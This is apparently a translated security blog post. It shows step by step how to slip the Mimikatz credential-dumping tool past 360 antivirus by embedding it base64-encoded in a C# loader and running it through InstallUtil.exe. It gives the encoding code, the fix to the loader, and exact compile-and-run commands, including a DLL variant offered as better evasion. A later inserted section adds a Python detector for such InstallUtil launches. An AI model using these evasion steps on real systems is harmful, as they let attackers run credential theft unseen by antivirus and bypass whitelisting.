Using a whitelisted program to bypass 360: a worked instance
0x00 Preface
Recently, subTee described in his blog how to use whitelisted programs to bypass protection, but there is a bug in the details. This article therefore only describes how to fix that bug and how to use the method to bypass 360; further ways of exploiting it remain to be explored.
0x01 Test target
Get the latest Mimikatz release past anti-virus scanning and removal.
0x02 Test environment
Operating system: Win7 x64
Mimikatz version: 2.0 alpha 20150906 (oe.eo) edition (the latest at the time of writing)
Download link: https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20150906
Test Date:
0x03 Actual test
We recommend reading the reference link first; the basic knowledge covered there will not be repeated here.
1. Download the latest mimikatz and test whether it is detected.
Unsurprisingly, it is detected and removed.
2. Use installutil.exe to execute the program
(1) Download https://gist.github.com/subtee/00cdac8990584bd2c2fe and save it as PELoader.cs
(2) Following the example in the blog, run the following commands:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe
This generates PELoader.exe and then executes it through installutil.exe.
Mimikatz is loaded and runs; the process that appears is installutil.exe.
(3) Test whether the generated PELoader.exe is detected
360 successfully detects it as a threat.
(4) Try modifying PELoader.cs
Reading the code shows that lines 853-856 hold the base64-encoded mimikatz.
Next, apply the modification method provided by the author, which is as follows:
* Base64 Encode Mimikatz In PowerShell
$fileName = "mimikatz.exe"
$fileContent = get-content $fileName
$fileContentBytes = [System.Text.Encoding]::UTF8.GetBytes($fileContent)
$fileContentEncoded = [System.Convert]::ToBase64String($fileContentBytes)
$fileContentEncoded | set-content ($fileName + ".b64")
* [OR]
byte[] AsBytes = File.ReadAllBytes(@"C:\Tools\Mimikatz.exe");
String AsBase64String = Convert.ToBase64String(AsBytes);
StreamWriter sw = new StreamWriter(@"C:\Tools\Mimikatz.b64");
sw.Write(AsBase64String);
sw.Close();
(5) Test "Base64 Encode Mimikatz In PowerShell"
Mimikatz is base64-encoded with the author's PowerShell method and stored in the file Mimikatz.b64.
Run the PowerShell code; Mimikatz.b64 is generated.
Copy its contents into the definition of the variable KatzCompressed in PELoader.cs.
Run the test as in step (2): it fails with an error.
0x04 Analysis
If the example code provided by the author cannot be modified as described, a working modification method must be found so that an arbitrary program can be executed.
0x05 Solution
After multiple experiments and reading the code, I found the cause of the error:
a parsing error exists between the PowerShell base64 encoding and the C# base64 decoding.
Solution:
(1) Use C# to base64-encode mimikatz
The code is as follows:
using System;
using System.IO;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace test1
{
    class Program
    {
        static void Main(string[] args)
        {
            // Read the raw bytes of the file and base64-encode them as-is
            byte[] AsBytes = File.ReadAllBytes(@"C:\testcs\mimikatz.exe");
            String AsBase64String = Convert.ToBase64String(AsBytes);
            StreamWriter sw = new StreamWriter(@"C:\testcs\mimikatz.b64");
            sw.Write(AsBase64String);
            sw.Close();
        }
    }
}
My environment is VS2012: create a C# project, paste in the above code, compile and run it, and a new mimikatz.b64 is generated.
Careful students will notice that it differs from the mimikatz.b64 generated by PowerShell.
(2) Replace the definition of KatzCompressed.
(3) Modify the decoding process
Locate line 106 of PELoader.cs,
byte[] decompressed = Decompress(FromBase64);
and comment it out by prefixing it with "//".
(4) Recompile and execute with installutil.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe
Verify that the modification succeeds and that the modified code executes.
(5) Improved detection evasion
Run the following instead:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /target:library /out:PELoader.dll PELoader.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.dll
This also loads mimikatz.
Test the detection status.
Note: 360 was enabled throughout the test, and its active defense was not triggered.
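From the defender's side, the InstallUtil.exe launches shown above leave a distinctive process-creation footprint: the /U switch with no preceding install, logging suppressed via /logfile= and /LogToConsole=false, and an assembly outside any trusted install location. The following Python is an added example (not from the original post or from subTee's loader) that scores Sysmon-style process-creation events on those three signals; the events, field names and paths are constructed.

```python
import re

# Constructed sample events in simplified Sysmon Event ID 1 (process creation)
# form: Image, CommandLine, ParentImage. Not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "CommandLine": r"InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "CommandLine": r"InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\bob\PELoader.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe",
     "CommandLine": r'InstallUtil.exe "C:\Program Files\Vendor\Service.exe"',
     "ParentImage": r"C:\Program Files\Vendor\setup.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
]

# Assumed trusted locations for legitimately installed service assemblies.
TRUSTED_PREFIXES = (r"c:\program files", r"c:\windows")

def split_cmdline(cmdline):
    """Split a Windows command line into tokens, honouring double quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def analyze_event(event):
    """Return an alert dict for a suspicious InstallUtil.exe launch, else None."""
    if event["Image"].rsplit("\\", 1)[-1].lower() != "installutil.exe":
        return None
    args = split_cmdline(event["CommandLine"])[1:]   # drop the image token
    lowered = [a.lower() for a in args]
    reasons = []
    if any(a in ("/u", "/uninstall", "-u", "-uninstall") for a in lowered):
        reasons.append("uninstall switch (/U) with no preceding install")
    if any(a in ("/logfile=", "/logtoconsole=false") for a in lowered):
        reasons.append("installer logging suppressed")
    for asm in (a for a in args if not a.startswith(("/", "-"))):
        if "\\" not in asm or not asm.lower().startswith(TRUSTED_PREFIXES):
            reasons.append("assembly outside trusted install locations: " + asm)
    if not reasons:
        return None
    return {"parent": event["ParentImage"], "cmdline": event["CommandLine"],
            "reasons": reasons, "score": len(reasons)}

def detect(events):
    """Run analyze_event over a batch of events and keep only the alerts."""
    return [a for a in (analyze_event(e) for e in events) if a]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["score"], alert["cmdline"], alert["reasons"], sep=" | ")
```

Only the two PELoader launches score; the vendor installer under Program Files and the unrelated process produce no alert, so in practice the /U plus suppressed-logging pair is the signal to tune on.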
0x06 Summary
By executing a program through installutil.exe, you can not only bypass antivirus detection and removal but also avoid application-whitelisting restrictions on which programs may run. Behaviour on other operating systems differs; more details are worth studying.